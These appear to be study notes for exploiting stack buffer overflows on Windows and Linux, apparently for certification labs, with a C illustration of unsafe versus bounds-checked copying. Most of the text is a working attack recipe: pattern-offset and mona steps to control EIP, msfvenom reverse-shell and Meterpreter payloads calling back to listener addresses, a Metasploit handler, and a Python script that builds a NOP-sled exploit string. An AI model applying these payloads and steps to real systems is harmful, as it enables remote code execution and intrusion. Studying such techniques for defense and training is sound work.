Buffer overflow
Windows
1. Fuzzing
Find where we can overflow the buffer.
Create a pattern:
/opt/metasploit-framework/embedded/framework/tools/exploit/pattern_create.rb -l 5000
Copy the EIP value and run the following command to find the offset
/opt/metasploit-framework/embedded/framework/tools/exploit/pattern_offset.rb -q (EIP)
set the offset in exploit.py
set retn to BBBB (42424242) in exploit.py
Verify that we have 42424242 in the EIP (we can control the EIP)
2. Finding bad chars
Generate badchars (every byte from \x01 to \xff, leaving out \x00):
#!/usr/bin/env python3
# prints the 255 candidate bytes as escaped literals to paste into exploit.py
for x in range(1, 256):
    print("\\x" + "{:02x}".format(x), end='')
print()
Put that into the payload in exploit.py
Mona check for badchars
!mona config -set workingfolder c:\mona\%p
!mona bytearray -b "\x00"
# Run exploit.py
!mona compare -f C:\mona\oscp\bytearray.bin -a <addressESP>
If we found badchars (\xe6 for example):
take the first
remove it from the payload
!mona bytearray -b "\x00\xe6"
restart program in immunity debugger
rerun exploit.py
REPEAT until no badchars
3. Finding a jump point
(specify all badchars)
!mona jmp -r esp -cpb "\x00"
Check the results in the Log data window, pick an address and set it as the retn value in exploit.py, written byte-reversed (little endian), for example: 625014DF
--> retn = "\xDF\x14\x50\x62"
4. Exploit
Reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=10.9.0.43 LPORT=4444 EXITFUNC=thread -b "\x00" -f c
Meterpreter
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.9.0.43 LPORT=4444 -f c -b "\x00\x09"
If using WINE
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.8.189.215 LPORT=4242 EXITFUNC=thread -f c -e x86/shikata_ga_nai -a x86 -b "\x00"
5. Metasploit
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.9.0.43
set lport 4444
exploit
run post/multi/recon/local_exploit_suggester
Linux
Cause a segmentation fault:
dmesg | tail
: to see at which address the segfault happened
readelf -s ./program
: -s for symbols, lists the symbols (and functions) of the binary
python3 -c "print('A'*30)" | ./program
: feeds 30 times A to the program to find the offset
Stack :
+-------
| ESP (extended stack pointer)
+-------
|
| buffer space
|
+-------
| EBP (extended base pointer)
+-------
| EIP (extended instruction pointer) / Return address
| this is the one we want to override
+-------
Finding a buffer overflow: fuzzing = sending custom strings of varying length and content to each input we wish to test.
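Added illustration (not part of the original notes) of what the stack diagram and the fuzzing step are about: a function with the unbounded copy that produces the overflow, beside a bounds-checked version that refuses oversized input, and a length sweep in the spirit of fuzzing. The function names and the 16-byte buffer size are chosen for this example.

```c
#include <stdio.h>
#include <string.h>

#define BUF_LEN 16   /* example buffer size, chosen for this illustration */

/* Vulnerable shape from the stack diagram: an unbounded strcpy into a
 * fixed-size local. Input longer than the buffer runs over the saved
 * EBP and the return address (EIP/RIP) that sit above it on the stack.
 * (Only called with short input here.) */
int greet_unsafe(const char *input)
{
    char buffer[BUF_LEN];
    strcpy(buffer, input);              /* no length check: the overflow */
    return (int)strlen(buffer);
}

/* Hardened form: check the length before copying and refuse anything
 * that does not fit together with the terminating NUL. Compiling with
 * -fstack-protector adds a canary that also catches a missed case. */
int greet_safe(const char *input, size_t input_len)
{
    char buffer[BUF_LEN];
    if (input_len >= sizeof(buffer))
        return -1;                      /* too long: reject, do not copy */
    memcpy(buffer, input, input_len);
    buffer[input_len] = '\0';
    return (int)input_len;
}

/* Fuzzing-style sweep: feed runs of 'A' of growing length (like the
 * 'A'*30 probe above) and report the first length the checked version
 * refuses, i.e. where the unchecked version would start to overflow. */
int first_rejected_length(int max_len)
{
    char probe[256];
    for (int n = 0; n <= max_len && n < (int)sizeof(probe) - 1; n++) {
        memset(probe, 'A', (size_t)n);
        probe[n] = '\0';
        if (greet_safe(probe, (size_t)n) < 0)
            return n;
    }
    return -1;
}

int main(void)
{
    printf("greet_safe(\"hello\") = %d\n", greet_safe("hello", 5));
    printf("first rejected length = %d\n", first_rejected_length(64));
    return 0;
}
```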
Exploiting a buffer overflow
Generate a reverse shell in python (buffer)
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.9.0.78 LPORT=4444 -f python
To find the offset, use the string generated by /opt/metasploit-framework/embedded/framework/tools/exploit/pattern_create.rb -l xxxx to create a segfault.
Run the target program in gdb, pass the string to trigger the segfault and look into the registers: info registers
Look into rsp: x/xg $rsp and copy the value.
Use this value in /opt/metasploit-framework/embedded/framework/tools/exploit/pattern_offset.rb -q VALUE to find the offset.
Then, such a Python program can be used to generate the exploit string:
#!/usr/bin/env python3
import sys
from struct import pack

buf = b""
# buf += ...   (paste the msfvenom -f python output here)
offset = 616
padding = offset - len(buf) - 100
# to find rip, look into the stack and find the line where the reverse shell payload starts
rip = 0x007fffffffe2d6
# pack("<Q", rip) writes the address as 8 bytes in little endian (zero-padded at the top)
payload = b"\x90" * padding + buf + b"\x90" * 100 + pack("<Q", rip)
# \x90 is important, it's NOP (no operation): the 100-byte NOP sled gives rip some slack
# write raw bytes, not text, so nothing gets re-encoded
sys.stdout.buffer.write(payload)
To find the rip address in gdb, print the stack: x/600x $rsp-600
Locally, run nc -lvnp 4444
In gdb, run: run < <(python sploit.py)
gdb
break main : set a breakpoint at the main function
layout next : displays the layout
watch variable : track a variable for changes
next : next line
step : step into function
Other
sudo socat TCP-LISTEN:1337,nodelay,reuseaddr,fork EXEC:"stdbuf -i0 -o0 -e0 ./program"